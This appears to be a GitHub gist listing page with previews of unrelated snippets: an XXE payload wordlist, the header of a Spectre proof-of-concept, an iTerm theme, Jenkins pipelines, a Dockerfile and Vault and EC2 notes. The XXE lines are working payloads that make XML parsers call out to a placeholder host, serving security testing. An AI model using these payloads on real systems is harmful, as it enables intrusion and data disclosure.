Skip to content

Instantly share code, notes, and snippets.

View morkot's full-sized avatar
🇺🇦

Andrii Melekhovskiy morkot

🇺🇦
View GitHub Profile
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@rootkea
rootkea / spectre.c
Created January 4, 2018 15:36
PoC from Spectre Attacks: Exploiting Speculative Execution (https://spectreattack.com/spectre.pdf)
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@kevinsperrine
kevinsperrine / gatito.itermcolors
Last active May 19, 2020 19:28
Gatito Color theme for iTerm
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Ansi 0 Color</key>
<dict>
<key>Alpha Component</key>
<real>1</real>
<key>Blue Component</key>
<real>0.18039216101169586</real>
pipeline {
agent any
stages {
stage('init') {
steps {
script {
def sbtHome = tool 'sbt-0.13.15'
env.sbt= "${sbtHome}/bin/sbt -no-colors -batch"
}
}
@muuki88
muuki88 / jenkins-sbt.groovy
Created November 2, 2016 17:03
Jenkins 2.0 SBT build pipeline
node {
stage('Git') {
git 'https://github.com/muuki88/activator-play-cluster-sample.git'
}
stage('Build') {
def builds = [:]
builds['scala'] = {
// assumes you have the sbt plugin installed and created an sbt installation named 'sbt-0.13.13'
sh "${tool name: 'sbt-0.13.13', type: 'org.jvnet.hudson.plugins.SbtPluginBuilder$SbtInstallation'}/bin/sbt compile test"
}
FROM codeship/ruby
MAINTAINER Dave Mox <[email protected]>
RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y \
git \
vim
COPY Makefile /src/
@voxxit
voxxit / USING-VAULT.md
Last active July 7, 2022 03:02
Consul + Vault + MySQL = <3
git clone https://gist.github.com/dd6f95398c1bdc9f1038.git vault
cd vault
docker-compose up -d
export VAULT_ADDR=http://192.168.99.100:8200

Initializing a vault:

vault init
@RJ
RJ / vmware-ec2.md
Last active February 1, 2023 13:18
Exporting VMWare images (OVA) from EC2

How to provision VMWare compatible .ova images on EC2

EC2 only lets you export instances as VMWare-compatible OVA files if you originally imported that instance from an OVA. Presumably it preserves the metadata and XML gubbins for the instance, and just wraps it up again using that metadata on export.

In order to provision arbitrary VMs in an OVA-exportable way, we abuse the volume snapshots on one VM.

Prep work:

  • Make a fresh install of ubuntu server or whatever your base distro is, in VMWare, export as OVA file. (single disk only!)
  • Untar the OVA and import the VMDK file into ec2 using ec2-instance-import onto an HVM instance type (ie, no xen kernel needed)
@denji
denji / http-benchmark.md
Last active March 27, 2025 19:46
HTTP(S) Benchmark Tools / Toolkit for testing/debugging HTTP(S) and restAPI (RESTful)